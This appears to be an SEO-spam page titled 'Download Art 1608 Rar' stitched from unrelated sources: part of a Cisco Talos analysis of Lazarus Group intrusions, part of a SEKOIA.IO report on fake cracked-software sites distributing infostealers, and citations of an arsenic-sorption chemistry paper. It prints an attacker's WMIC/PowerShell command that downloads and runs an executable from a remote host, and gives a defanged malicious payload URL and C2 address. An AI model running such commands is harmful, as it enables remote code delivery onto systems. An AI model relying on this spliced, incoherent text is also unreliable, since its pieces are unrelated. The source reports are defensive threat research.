##VERIFIED## Download Art 1608 Rar
Cisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle,YamaBot), describing them in detail and attributed the campaigns to the Lazarus threat actor.The TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been described in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address84[.]38.133[.]145, which was used as a hosting platform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.Cisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence, however, we're raising our confidence level when analyzing all these points in the context of the campaign and victims.
Download Art 1608 rar
Once the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware implant from a malware family known to be developed and operated by Lazarus called "VSingle."The deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload (archive) [T1608]:
The archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable which is optionally renamed and then persisted on the endpoint by creating an auto-start service.
The implant is simple in terms of functionalities and is basically a stager that enables the attackers to deploy more malware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and allows untethered access to the attackers to the endpoint to execute commands via "cmd.exe."Although a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins can either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the code used to execute a shellcode downloaded.
What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems.This implant called "MagicRAT" is outlined in a recently published post. The reverse interactive shell eventually downloads MagicRAT from a remote location.
Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system [T1608/001].WMIC /node: process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('/svhostw.exe','\\svhostww.exe')" In some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell.This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors on the commands.
Across the first endpoints compromised in the enterprises, we observed the attackers downloading their custom implants from remote locations and deploying and persisting them on the systems.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Information stealer (or infostealer) is a malware family designed to gather and exfiltrate sensitive information from the infected host. This threat became widespread over the past few years, and is increasingly distributed by multiple threat actors from the cybercrime ecosystem. The distribution methods used to spread stealers are varied, ranging from malspam to fake installers. As observed by SEKOIA.IO, most infection chains leverage social engineering techniques to lure victims into downloading and executing the malicious payloads.
A common scheme to trick the victim is a tutorial that demonstrates how to install a cracked software, which turns out to be an information stealer. For the distribution method, the victim enters a malicious website either promoted through a Google Ad, or SEO poisoned (Search Engine Optimization), or shared in a legitimate community space. To assist the victim in compromising its system, the tutorial often describes step-by-step how to disable the antivirus software, download the fake installer and run it.
SEKOIA.IO analysts unveiled a large and resilient infrastructure used to distribute Raccoon and Vidar stealers, likely since early 2020. The associated infection chain, leveraging this infrastructure of over 250 domains, uses about a hundred of fake cracked software catalogue websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.This blogpost aims at presenting the current infection chain, payloads and the whole infrastructure tracked by SEKOIA.IO. We will contact the services abused by the intrusion set to forward the domain names and accounts used for malicious activities.
This webpage contains information on the legitimate Adobe Photoshop software, increasing the capability to gain the trust of potential victims. It also contains dozens of URLs redirecting to other pages of this website, as well as to the legitimate Adobe website or other platforms, including YouTube. This contributes to improving the website indexing in search engines (SEO poisoning technique).The content of the webpages ends with a tutorial demonstrating how to install the cracked version of the software, and several download buttons redirecting the user to step 2.
Browsing the Cuttly redirects the user to the download page of an archive, hosted on the legitimate file sharing platform GitHub:hxxps://raw.githubusercontent[.]com/davids1a/soulmate/main/NewInstaller_1234_FullVersion_B4.rar
More importantly, this blogpost highlights the potential risks of downloading cracked software, a very common social engineering technique to install malware. We highly recommend only downloading and installing software from trusted, official websites. Beyond the indicators of compromise, detection teams can hunt for infection chains leveraging fake cracked software by searching for weak signals, such as communications to unusual TLD and to URLs containing IP addresses, or looking for suspicious file names.
Castro, L.; Ayala, L.A.; Vardanyan, A.; Zhang, R.; Muñoz, J.Á. Arsenate and Arsenite Sorption Using Biogenic Iron Compounds: Treatment of Real Polluted Waters in Batch and Continuous Systems. Metals 2021, 11, 1608.
Castro L, Ayala LA, Vardanyan A, Zhang R, Muñoz JÁ. Arsenate and Arsenite Sorption Using Biogenic Iron Compounds: Treatment of Real Polluted Waters in Batch and Continuous Systems. Metals. 2021; 11(10):1608.
Castro, Laura, Lesly Antonieta Ayala, Arevik Vardanyan, Ruiyong Zhang, and Jesús Ángel Muñoz. 2021. "Arsenate and Arsenite Sorption Using Biogenic Iron Compounds: Treatment of Real Polluted Waters in Batch and Continuous Systems" Metals 11, no. 10: 1608. 041b061a72